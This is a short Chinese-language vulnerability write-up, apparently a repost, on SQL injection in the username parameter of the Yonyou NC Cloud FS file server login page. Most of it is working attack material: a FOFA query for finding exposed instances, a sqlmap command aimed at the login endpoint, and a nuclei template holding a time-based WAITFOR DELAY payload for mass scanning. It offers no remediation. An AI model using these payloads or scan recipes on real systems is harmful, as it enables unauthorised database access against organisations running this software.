用友NC Cloud FS文件服务器SQL注入 | 您所在的位置:网站首页 › 用友icloud › 用友NC Cloud FS文件服务器SQL注入 |
漏洞描述
用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入。 漏洞影响用友NC Cloud且存在FS文件服务器配置管理登录页面。 漏洞复现fofa语法:app="用友-NC-Cloud" && icon_hash="1596996317" 用友NC Cloud登录页面如下: 在应用中存在文件服务器管理登录页面 http://xxx.xxx.xxx.xxx/fs/ 拦截文件服务器页面的登录请求数据包,然后直接sqlmap梭哈。 sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username nuclei批量yaml文件 id: yonyou_NCCloud_FS_sqli info: name: 用友 NCCloud FS文件管理SQL注入 author: mczilong severity: critical tags: yonyou description: fofa "NCCloud" requests: - raw: - | @timeout: 15s GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - 'duration>=8' |
CopyRight 2018-2019 实验室设备网 版权所有 |